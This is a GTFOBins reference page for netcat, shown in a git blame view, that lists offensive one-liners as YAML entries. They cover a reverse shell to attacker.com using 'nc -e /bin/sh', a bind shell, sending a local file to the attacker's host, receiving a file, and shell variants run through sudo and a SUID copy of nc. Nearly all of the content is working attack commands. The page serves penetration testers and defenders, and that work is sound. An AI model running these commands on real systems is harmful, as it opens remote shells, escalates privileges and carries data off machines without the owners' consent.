GTFOBins.github.io/_gtfobins/nc.md

40 lines
1.4 KiB
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-10-05 19:55:38 +02:00
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
2018-07-16 15:01:50 +02:00
code: |
RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT
2018-10-05 19:55:38 +02:00
bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
2018-07-16 15:01:50 +02:00
code: |
LPORT=12345
nc -l -p $LPORT -e /bin/sh
2018-10-05 19:55:38 +02:00
file-upload:
- description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
2018-07-16 15:01:50 +02:00
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"
2018-10-05 19:55:38 +02:00
file-download:
- description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
2018-07-16 15:01:50 +02:00
code: |
LPORT=12345
LFILE=file_to_save
nc -l -p $LPORT > "$LFILE"
2018-10-05 19:55:38 +02:00
sudo:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: |
RHOST=attacker.com
RPORT=12345
2018-07-22 16:42:43 +02:00
sudo nc -e /bin/sh $RHOST $RPORT
2018-10-05 19:55:38 +02:00
limited-suid:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
code: |
RHOST=attacker.com
RPORT=12345
2018-07-22 16:42:43 +02:00
./nc -e /bin/sh $RHOST $RPORT
2018-05-21 21:14:41 +02:00
---